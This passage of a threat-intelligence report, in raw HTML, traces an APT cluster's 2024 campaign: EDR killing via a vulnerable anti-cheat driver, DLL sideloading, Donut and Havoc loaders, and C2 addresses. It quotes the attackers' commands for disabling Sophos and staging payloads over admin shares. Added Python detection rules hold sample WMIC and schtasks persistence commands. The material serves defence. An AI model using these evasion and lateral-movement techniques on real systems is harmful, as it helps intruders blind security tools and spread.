From November 2023 to at least May 2024, the actors in Cluster Charlie deployed C2 implants using 28 unique combinations of sideloading chains, execution methods, and shellcode loaders.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">The reasons the actors were rapidly rotating their C2 channels and their deployment methods are likely threefold:<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<ul>\n<li><span data-contrast=\"none\">There is evidence the actors were testing to see whether different files and deployment methods would be detected by Sophos.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/li>\n<li><span data-contrast=\"none\">Rapidly rotating C2 channels and deployment methods makes it harder for defenders to keep up and block them.\u00a0<\/span>
<span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/li>\n<li><span data-contrast=\"none\">The attackers were responding to our actions to block them, sometimes re-establishing access within 24 hours and deploying a modified, unique sample in fewer than four days to evade the blocking detections we had deployed.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/li>\n<\/ul>\n<figure id=\"attachment_957277\" aria-describedby=\"caption-attachment-957277\" style=\"width: 640px\" class=\"wp-caption alignnone\"><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP_2_image4.png\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-957277 size-full\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP_2_image4.png\" alt=\"Figure 4: A timeline of the continued threat activity in 2024\u00a0\" width=\"640\" height=\"361\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP_2_image4.png 2255w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP_2_image4.png?resize=300,169 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP_2_image4.png?resize=768,433 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP_2_image4.png?resize=1024,577 1024w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP_2_image4.png?resize=1536,866 1536w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP_2_image4.png?resize=2048,1154 2048w\" 
sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><figcaption id=\"caption-attachment-957277\" class=\"wp-caption-text\"><em>Figure 4: The continued threat activity in 2024<\/em><\/figcaption><\/figure>\n<p><span data-contrast=\"none\">In January, we saw further targeted capture of user documents and of Viber for Desktop communications databases, which hold the organization&#8217;s internal chats. The attackers also took measures to disable endpoint protection software, or to evade detection where it could not be disabled.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<h3><span data-contrast=\"none\">January 2024: RealBlindingEDR<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"none\">In January 2024, Sophos MDR observed the actors deploying two slightly modified samples of <\/span><a href=\"https:\/\/github.com\/myzxcg\/RealBlindingEDR\"><span data-contrast=\"none\">RealBlindingEDR<\/span><\/a><span data-contrast=\"none\">, an open-source tool designed to &#8220;blind&#8221; (or kill) malware protection and endpoint detection and response (EDR) solutions. 
Ironically, the actors abused a malware protection product to execute the EDR killer, creating an execution chain that would appear &#8220;safe&#8221; to other malware protection tools, similar to how previous \u201cEDR killer\u201d malware has <\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2023\/04\/19\/aukill-edr-killer-malware-abuses-process-explorer-driver\/\"><span data-contrast=\"none\">used trusted Windows components<\/span><\/a><span data-contrast=\"none\">.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">To illustrate how the attack chain became more complicated, here is how the adversaries launched the RealBlindingEDR binary asoc.exe:<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">First, the attacker ran a batch file (33.bat) that executed the following command:\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<pre><span data-contrast=\"none\">cd c:\\ProgramData &amp;&amp; c:\\ProgramData\\kaba.exe run run-cmd \"c:\\ProgramData\\asoc.exe -cccc\"<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/pre>\n<p><span data-contrast=\"none\">This command leverages kaba.exe, a renamed copy of a legitimate Kaspersky executable, to launch the RealBlindingEDR sample asoc.exe, so the EDR killer starts as a child process of a security vendor&#8217;s own binary.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">Once executed, asoc.exe first attempts to check whether the echo 
driver is loaded. If not, it will try to load the driver ProgramData\\mico.sys (a renamed copy of echo_driver.sys, deployed as part of the RealBlindingEDR kit) and obtain a handle to it. The binaries exploit <\/span><a href=\"https:\/\/ioctl.fail\/echo-ac-writeup\/\"><span data-contrast=\"none\">a vulnerability in the Echo.ac anti-cheat driver for Minecraft<\/span><\/a><span data-contrast=\"none\"> (CVE-2023-38817), which gives a user-mode caller arbitrary kernel memory read and write, and use that primitive to <\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2022\/10\/04\/blackbyte-ransomware-returns\/\"><span data-contrast=\"none\">remove kernel notification routines<\/span><\/a><span data-contrast=\"none\"> registered by a number of different EDR products; the same primitive lets the actors escalate privileges through token theft. Echo.ac was deployed in this and other cases as mico.sys. The attack then uses the same technique to remove the registry callbacks registered through CmRegisterCallback and the minifilter (file system) callbacks, two kernel mechanisms that many EDR products rely on to monitor system activity.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">After RealBlindingEDR removes these kernel routines, it unloads the Echo.ac driver (mico.sys) and runs<\/span><\/p>\n<pre><span data-contrast=\"none\">taskkill \/IM SophosFileScanner.exe \/F<\/span><\/pre>\n<p><span data-contrast=\"none\">to kill the SophosFileScanner.exe process, which no longer has kernel callbacks protecting it. To signal that the operation succeeded, the binaries create an empty file at C:\\Users\\Public\\log.ini. 
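<\/span><\/p>\n<p>The following Python is an added example for this section and is not code from the Sophos report or from the RealBlindingEDR project. It runs four detection rules over a handful of constructed Sysmon-style events that mirror the chain described above: a helper in a user-writable directory proxying execution through a run run-cmd argument, a driver loading from a user-writable path (the renamed echo_driver.sys), a taskkill \/IM against a security product process, and the Image File Execution Options MinimumStackCommitInBytes write that the report attributes to the ssoc.exe variant. Field names follow Sysmon event IDs 1, 6 and 13; the security process list beyond SophosFileScanner.exe, the writable-directory list and the sample events themselves are assumptions made for the example.<\/p>

```python
import re

# Security product processes the chain goes after. SophosFileScanner.exe is the one
# named in the report; MsMpEng.exe (Defender) is an assumed extra entry for illustration.
SECURITY_PROCESSES = {'sophosfilescanner.exe', 'msmpeng.exe'}

# Locations a staging script can write to without install-time privileges; drivers and
# vendor helpers have no business executing from here (assumed list).
WRITABLE_DIRS = ('c:\\programdata', 'c:\\users\\public', 'c:\\perflogs', '\\temp\\')

RUNCMD_RE = re.compile(r'^\s*"?([^"\s]+)"?\s+run\s+run-cmd\s+"?([^"\s]+)', re.I)
TASKKILL_RE = re.compile(r'\btaskkill\b.*?/im\s+"?([\w.-]+\.exe)', re.I)
IFEO_RE = re.compile(
    r'image file execution options\\([^\\]+)\\minimumstackcommitinbytes$', re.I)


def in_writable_dir(path):
    p = path.lower()
    return any(d in p for d in WRITABLE_DIRS)


def detect(events):
    """Return (rule, detail) hits, in event order, for Sysmon-style event dicts."""
    hits = []
    for ev in events:
        eid = ev['EventID']
        if eid == 1:                                   # ProcessCreate
            cmd = ev.get('CommandLine', '')
            m = RUNCMD_RE.search(cmd)
            # A vendor helper launched from a writable dir, told to run another binary
            # from a writable dir: the kaba.exe proxy-execution shape.
            if m and in_writable_dir(m.group(1)) and in_writable_dir(m.group(2)):
                hits.append(('proxy_exec_run_cmd', m.group(2)))
            m = TASKKILL_RE.search(cmd)
            if m and m.group(1).lower() in SECURITY_PROCESSES:
                hits.append(('security_process_kill', m.group(1)))
        elif eid == 6:                                 # DriverLoad
            drv = ev.get('ImageLoaded', '')
            # Signed is not enough: echo_driver.sys is validly signed, so the tell is
            # the path (or the original name when it has not been renamed).
            if in_writable_dir(drv) or drv.lower().endswith('echo_driver.sys'):
                hits.append(('suspicious_driver_load', drv))
        elif eid == 13:                                # RegistryEvent (value set)
            m = IFEO_RE.search(ev.get('TargetObject', ''))
            if m and m.group(1).lower() in SECURITY_PROCESSES:
                hits.append(('ifeo_stack_commit_tamper', m.group(1)))
    return hits


# Constructed sample telemetry following the shapes in the report (not real logs).
SAMPLE_EVENTS = [
    {'EventID': 1, 'Image': 'c:\\ProgramData\\kaba.exe',
     'CommandLine': 'c:\\ProgramData\\kaba.exe run run-cmd "c:\\ProgramData\\asoc.exe -cccc"'},
    {'EventID': 6, 'ImageLoaded': 'C:\\ProgramData\\mico.sys', 'Signed': 'true'},
    {'EventID': 1, 'Image': 'C:\\Windows\\System32\\taskkill.exe',
     'CommandLine': 'taskkill /IM SophosFileScanner.exe /F'},
    {'EventID': 13, 'EventType': 'SetValue',
     'TargetObject': 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\'
                     'Image File Execution Options\\SophosFileScanner.exe\\MinimumStackCommitInBytes'},
    # Benign noise that must not fire: an inbox driver and an unrelated taskkill.
    {'EventID': 6, 'ImageLoaded': 'C:\\Windows\\System32\\drivers\\tcpip.sys', 'Signed': 'true'},
    {'EventID': 1, 'Image': 'C:\\Windows\\System32\\taskkill.exe',
     'CommandLine': 'taskkill /IM notepad.exe /F'},
]

if __name__ == '__main__':
    for rule, detail in detect(SAMPLE_EVENTS):
        print(rule, detail)
```

<p>Each rule is useful on its own, but the sequence is the real signal: a run-cmd proxy launch, a driver from ProgramData and a kill of a security process on the same host within a few seconds is the whole chain, and warrants isolation rather than a ticket. The rules inspect only the command line and the registry path, so a renamed taskkill or a value written through a direct NtSetValueKey call would need process-ancestry or kernel telemetry to catch.<\/p>\n<p><span data-contrast=\"none\">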
An empty C:\\Users\\Public\\log.ini therefore marks a host where the kill succeeded.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">Another RealBlindingEDR sample discovered, ssoc.exe, has an additional capability: It uses a <\/span><a href=\"https:\/\/www.trendmicro.com\/de_de\/research\/23\/e\/attack-on-security-titans-earth-longzhi-returns-with-new-tricks.html\"><span data-contrast=\"none\">known technique<\/span><\/a><span data-contrast=\"none\"> to try to crash EDR processes, by creating a Registry key named SophosFileScanner.exe under SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options, and creating a string value named MinimumStackCommitInBytes inside it. Windows applies that value to every new process with the matching image name, so a sufficiently large stack commit makes thread creation fail and the EDR process crash at startup.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Sophos also observed the actors\u2019 attempt to use an open-source tool called <\/span><a href=\"https:\/\/github.com\/weak1337\/Alcatraz\"><span data-contrast=\"none\">Alcatraz<\/span><\/a><span data-contrast=\"auto\">, which is an x64 binary obfuscator. Between February and May, the tool was detected (as ATK\/Alcatraz-D) at the location C:\\ProgramData\\conhost.exe and prevented from running on four separate occasions by Sophos.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<h3><span data-contrast=\"none\">February 2024: Testing tactics and tools<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"none\">After Sophos expanded its detection coverage of the Havoc C2 framework, the threat actor began rapidly cycling through a number of C2 implant options. 
They deployed the <\/span><a href=\"https:\/\/github.com\/INotGreen\/XiebroC2\"><span data-contrast=\"none\">XieBroC2 framework<\/span><\/a><span data-contrast=\"none\"> as a backup. At the same time, the actors appeared to be re-crafting their deployment mechanism.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">One of the mechanisms they turned to was <\/span><a href=\"https:\/\/github.com\/TheWover\/donut\"><span data-contrast=\"none\">Donut<\/span><\/a><span data-contrast=\"none\">, an open-source tool that converts an executable, DLL or .NET assembly into position-independent shellcode designed to evade security tools. A Donut loader decrypts its embedded payload in memory and can inject it into arbitrary Windows processes without the payload ever touching disk. The threat actors were observed repeatedly using Donut-based loaders to drop C2 implants, frequently dropping variants of implants within hours of each other on different hosts.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">On February 1, the actors appeared to conduct a form of <\/span><a href=\"https:\/\/en.wikipedia.org\/wiki\/A\/B_testing\"><span data-contrast=\"none\">A\/B testing<\/span><\/a><span data-contrast=\"none\"> of malware, deploying two different malicious DLLs with the same name (msntlm.dll) within two hours of each other. 
Both DLLs contacted the same C2 address (<\/span><span data-contrast=\"auto\">141.136.44.219, geolocated in Cyprus) at the domain name gsenergyspeedtest.com, which matches a domain naming pattern used by<\/span><a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/k\/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html\"><span data-contrast=\"none\"> APT 41 subgroup Earth Longzhi<\/span><\/a><span data-contrast=\"auto\"> and Cluster Charlie in previous activity.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Both malware DLLs were Donut shellcode loaders. One of the samples decoded and injected Havoc Shellcode Dropper into svchost.exe, which in turn injected an embedded Havoc payload into memory and executed it. The other sample decoded a Havoc Shellcode Injector that injected a Cobalt Strike Reflective Loader into svchost.exe.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">On another occasion, <\/span><span data-contrast=\"auto\">27 d<\/span><span data-contrast=\"none\">ays after the initial A\/B test, we observed the actors sideloading two versions of a malicious file (libcef.dll) by abusing the legitimate Java Chromium Embedded Framework Helper (jcef_helper.exe). 
One libcef.dll sample deployed XiebroC2 via shellcode from <\/span><span data-contrast=\"auto\">Donut (connecting to 64.176.50.42:8444, geolocated in the United States)<\/span><span data-contrast=\"none\">, while the other carried an encrypted Havoc payload embedded in it, which upon decryption reaches out to attacker IP 141.136.44.219, the same C2 address in Cyprus used in the February 1 incident.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">In total, in February and March 2024 we saw seven deployments of libcef.dll using jcef_helper.exe, in some cases renamed as C:\\PerfLogs\\conhost.exe and in others without renaming.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<h3><span data-contrast=\"none\">February and March 2024: Bringing along a helper<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"none\">On multiple occasions, the attackers brought along a vulnerable executable to sideload malicious DLLs. In February, they brought along the malicious file c:\\perflogs\\wsoc.exe and moved it around within the target environment to create processes for injection. SophosLabs determined that wsoc.exe works by starting an instance of the Microsoft WMI Provider Subsystem Host (WmiPrvSE.exe) so that it can then inject into it. In this case, it injected libcef.dll into WmiPrvSE.exe<\/span> <span data-contrast=\"auto\">as another layer of obfuscation. The commands appeared to be a form of testing by the adversaries.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">In March, the attackers made further adjustments to implants. 
In early March, the actor leveraged jconsole.exe to sideload the malicious DLL jli.dll (actual name: <\/span><a href=\"https:\/\/github.com\/florylsk\/ExecIT\"><span data-contrast=\"none\">ExecIT.dll<\/span><\/a><span data-contrast=\"auto\">, the ExecIT shellcode loader). Once sideloaded, the ExecIT DLL checks for a log.ini file in the same directory, then reads that file and injects its contents (the shellcode) into its own process memory. According to analysis by Sophos X-Ops, jli.dll also checks for different debuggers (scylla_x64.exe, ollydbg.exe, idaq64.exe, Zeta Debugger, or IMMUNITYDEBUGGER.EXE) and different monitoring and analysis tools (Unpacked.exe, reshacker.exe and others).<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Attackers dropped the sideloaded DLL through lateral movement from another compromised device, and the implant was observed generating outbound network connections to 198.13.47.158:443 (geolocated in Japan). This IP address was used previously, in March 2023, by Cluster Charlie threat actors as a C2 for a PocoProxy backdoor sample.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The threat actor moved laterally by copying the jconsole.exe, jli.dll, and log.ini files, and then created a remote scheduled task to execute the payload on targeted machines. Jconsole.exe was observed generating 131 different discovery, lateral movement, and indicator removal commands. 
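<\/span><\/p>\n<p>The lateral movement and persistence commands quoted in this report (the November WMIC process creation, the SYSTEM scheduled task whose rundll32 module is an .ini file, the remote schtasks \/s creation, and the staging of loaders over the admin share) share a few command-line shapes that are easy to hunt for in process-creation telemetry. The Python below is an added example and is not code from the Sophos report. The regexes, the rule names and the sample command lines are the author&#8217;s assumptions; the sample commands follow the shapes shown in the report with hypothetical hosts from the 192.0.2.0\/24 documentation range and a constructed .ini path.<\/p>

```python
import re

WMIC_NODE_RE = re.compile(r'\bwmic\b.*?/node:"?([\w.-]+)', re.I)
SCHTASKS_RE = re.compile(r'\bschtasks(?:\.exe)?\b', re.I)
REMOTE_HOST_RE = re.compile(r'/s\s+"?([\w.-]+)', re.I)            # schtasks /s HOST
TASKRUN_RE = re.compile(r'/tr\s+"([^"]+)"', re.I)                  # schtasks /tr "action"
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^",\s]+)\s*,\s*(\w+)', re.I)
ADMIN_SHARE_RE = re.compile(r'\\\\([\w.-]+)\\(?:c\$|admin\$)', re.I)


def analyze(cmd):
    """Return (rule, detail) hits for one process command line."""
    hits = []
    low = cmd.lower()

    m = WMIC_NODE_RE.search(cmd)
    if m and 'process call create' in low:
        hits.append(('remote_wmi_exec', m.group(1)))

    action = cmd                      # where to look for a rundll32 invocation
    if SCHTASKS_RE.search(cmd) and '/create' in low:
        m = REMOTE_HOST_RE.search(cmd)
        if m:
            hits.append(('remote_task_create', m.group(1)))
        # A SYSTEM task re-firing every N minutes is a beacon shape, not a maintenance job.
        if '/ru system' in low and '/sc minute' in low:
            hits.append(('system_task_minute_schedule', ''))
        tr = TASKRUN_RE.search(cmd)
        action = tr.group(1) if tr else ''

    # rundll32 takes a module path and an export; a module that is not a .dll
    # (an .ini in the hypervisor task) is the masquerading trick to look for.
    m = RUNDLL_RE.search(action)
    if m and not m.group(1).lower().endswith('.dll'):
        hits.append(('rundll32_non_dll_module', m.group(1)))

    m = ADMIN_SHARE_RE.search(cmd)
    if m and re.search(r'\bcopy\b', low):
        hits.append(('admin_share_copy', m.group(1)))
    return hits


def analyze_all(cmds):
    """Rule names fired per command, in input order."""
    return [[rule for rule, _ in analyze(c)] for c in cmds]


# Constructed sample command lines (not the report's own; IPs are documentation addresses).
SAMPLE_COMMANDS = [
    # Remote WMI process creation with explicit credentials.
    '/c wmic /node:192.0.2.10 /password:"REDACTED" /user:"REDACTED" process call create '
    '"cmd /c C:\\Windows\\syswow64\\rundll32.exe C:\\windows\\syswow64\\Windows.Data.Devices.Config.dll,Start"',
    # Local SYSTEM task whose rundll32 module is an .ini file (assumed path).
    'schtasks /create /tn Microsoft\\Windows\\Clip2 /tr "rundll32 C:\\ProgramData\\Testlog.ini,Start" '
    '/ru System /sc minute /mo 90 /f',
    # The same task created on a remote host with supplied credentials.
    '/c schtasks /create /s 192.0.2.20 /p "REDACTED" /u "REDACTED" /tn Microsoft\\Windows\\Clip2 '
    '/tr "C:\\Windows\\syswow64\\rundll32.exe C:\\windows\\syswow64\\Windows.Data.Devices.Config.dll,Start" '
    '/ru System /sc minute /mo 90 /f',
    # Staging a loader over the admin share under a benign-looking name.
    'cmd /c copy c:\\users\\public\\pp.exe \\\\192.0.2.20\\c$\\perflogs\\conhost.exe',
    # Benign: a nightly task running a program from its install directory.
    'schtasks /create /tn Backup\\Nightly /tr "C:\\Program Files\\Backup\\backup.exe" /sc daily /st 02:00',
]

if __name__ == '__main__':
    for cmd, rules in zip(SAMPLE_COMMANDS, analyze_all(SAMPLE_COMMANDS)):
        print(rules, cmd[:60])
```

<p>The rules key on arguments rather than binary names, so they survive the renaming the actors favoured (the renamed rundll32 host still has to name a module and an export). The remote_task_create and admin_share_copy hits both carry the target host, which is what an analyst needs first: every host that received a task or a file copy from the compromised source is a candidate for the same pivot.<\/p>\n<p><span data-contrast=\"auto\">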
Shortly after, the malicious jconsole.exe process executed from the remote scheduled task and made a direct IP connection to 198.13.47.158:443.\u00a0\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The attackers shifted to a Donut shellcode loader again on March 11, once again abusing jcef_helper.exe to sideload a <\/span><span data-contrast=\"none\">Havoc C2 implant (libcef.dll) alongside the file log.bin. The log.bin file acted as a trigger for the implant; the shellcode only injected the implant and made connections to the actor&#8217;s C2 (IP 45.77.46.245:443, geolocated in Singapore) when log.bin was present.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<h3><span data-contrast=\"none\">April 2024: Deploying tattletales<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559738&quot;:160,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">On April 8 and 12, the actors conducted three different sideloads abusing the legitimate identity_helper.exe component of the Edge browser to sideload malicious DLLs named msedge_elf.dll. This DLL is a Donut loader carrying a Havoc C2 payload in the form of a binary file, which it injects into memory upon decryption. 
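<\/span><\/p>\n<p>Every sideload described in this section follows one pattern: a legitimate, often renamed host binary (jcef_helper.exe, jconsole.exe, identity_helper.exe) executed from a directory it was never installed in, loading the one DLL it looks for next to itself (libcef.dll, jli.dll, msedge_elf.dll). The Python below is an added example, not code from the Sophos report, that joins Sysmon ProcessCreate (ID 1) and ImageLoad (ID 7) records to surface that pattern. The host-to-DLL pairs come from the report; the install roots, the sample records and the Edge version directory in them are assumptions made for the example.<\/p>

```python
import os

# Host binaries and the DLL each one loads from its own directory, per the report.
SIDELOAD_PAIRS = {
    'jcef_helper.exe': 'libcef.dll',
    'jconsole.exe': 'jli.dll',
    'identity_helper.exe': 'msedge_elf.dll',
}
# Assumed install roots where these hosts legitimately live on a workstation.
EXPECTED_ROOTS = ('c:\\program files\\', 'c:\\program files (x86)\\')


def basename(path):
    return os.path.basename(path.replace('\\', '/')).lower()


def find_sideloads(process_events, imageload_events):
    """Join Sysmon ID 1 and ID 7 records by ProcessGuid and return every load of a
    known sideload DLL that looks out of place, with the reasons it was flagged."""
    procs = {e['ProcessGuid']: e for e in process_events}
    hits = []
    for ev in imageload_events:
        proc = procs.get(ev['ProcessGuid'])
        if proc is None:
            continue
        # OriginalFileName survives renaming (conhost.exe, firefox.exe, fireconf.exe);
        # fall back to the on-disk name if the PE does not carry one.
        host = proc.get('OriginalFileName', '').lower() or basename(proc['Image'])
        expected_dll = SIDELOAD_PAIRS.get(host)
        if expected_dll is None or basename(ev['ImageLoaded']) != expected_dll:
            continue
        reasons = []
        if str(ev.get('Signed', 'false')).lower() != 'true':
            reasons.append('dll_unsigned')
        if not proc['Image'].lower().startswith(EXPECTED_ROOTS):
            reasons.append('host_outside_install_root')
        if basename(proc['Image']) != host:
            reasons.append('host_renamed')
        if reasons:
            hits.append({'host': proc['Image'], 'dll': ev['ImageLoaded'], 'reasons': reasons})
    return hits


# Constructed sample telemetry (not real logs); GUIDs shortened for readability.
PROCESS_EVENTS = [
    {'ProcessGuid': 'A', 'Image': 'C:\\PerfLogs\\conhost.exe', 'OriginalFileName': 'jcef_helper.exe'},
    {'ProcessGuid': 'B', 'Image': 'C:\\ProgramData\\identity_helper.exe',
     'OriginalFileName': 'identity_helper.exe'},
    {'ProcessGuid': 'C', 'Image': 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'
                                  '123.0.0.0\\identity_helper.exe',
     'OriginalFileName': 'identity_helper.exe'},
    {'ProcessGuid': 'D', 'Image': 'C:\\Users\\Public\\jconsole.exe'},
]
IMAGELOAD_EVENTS = [
    {'ProcessGuid': 'A', 'ImageLoaded': 'C:\\PerfLogs\\libcef.dll', 'Signed': 'false'},
    {'ProcessGuid': 'B', 'ImageLoaded': 'C:\\ProgramData\\msedge_elf.dll', 'Signed': 'false'},
    {'ProcessGuid': 'C', 'ImageLoaded': 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'
                                        '123.0.0.0\\msedge_elf.dll', 'Signed': 'true'},
    {'ProcessGuid': 'D', 'ImageLoaded': 'C:\\Users\\Public\\jli.dll', 'Signed': 'false'},
    {'ProcessGuid': 'D', 'ImageLoaded': 'C:\\Windows\\System32\\kernel32.dll', 'Signed': 'true'},
]

if __name__ == '__main__':
    for hit in find_sideloads(PROCESS_EVENTS, IMAGELOAD_EVENTS):
        print(hit['host'], hit['dll'], hit['reasons'])
```

<p>The legitimate Edge instance (process C) produces no hit because the DLL is signed and the host sits under its install root, while the three staged copies are flagged on two or three grounds each. The trigger-file variants (log.ini, log.bin, temp.log) are invisible at this layer; a FileCreate (ID 11) of a small non-executable file in the same directory shortly before the load is the natural companion rule.<\/p>\n<p><span data-contrast=\"auto\">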
In two of the three April sideloads, the accompanying encrypted Havoc payload was deposited in C:\\Windows\\temp\\temp.log and connected to the C2 host at 64.176.37.107:443 (geolocated in Canada); in the third, it was dropped in the same location as the DLL under the name log.ini, and it connected to 45.77.46.245:443 (geolocated in the United States).\u00a0\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">On April 10, the actors used another renamed jconsole.exe, this time renamed firefox.exe, in an effort similar to the March ExecIT attack. The shellcode loader in this case was not recovered, but the Havoc implant injected into firefox.exe and connected to 64.176.37.107:443, just as two of those injected by Donut loaders had. On April 12, a fourth attempt to leverage identity_helper.exe\u2014this time renamed as fireconf.exe\u2014was immediately stopped by Sophos endpoint protection.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Around the same time, the actors deployed a shellcode loader variant of msedge_elf.dll as a standalone executable (pp.exe) and staged it, together with its temp.log payload, on another host over the admin share:\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<pre><span data-contrast=\"auto\">cmd \/c \"copy c:\\users\\public\\temp.log \\\\172.xxx.xxx.xxx\\c$\\windows\\temp &amp;&amp; copy c:\\users\\public\\pp.exe \\\\172.xxx.xxx.xxx\\c$\\perflogs\\conhost.exe\"<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/pre>\n<p><span data-contrast=\"auto\">Also in early April, we observed two different keylogger tools being deployed to the same host at the same time, one of which is a previously unreported malware we&#8217;ve named TattleTale &#8212; a keylogger 
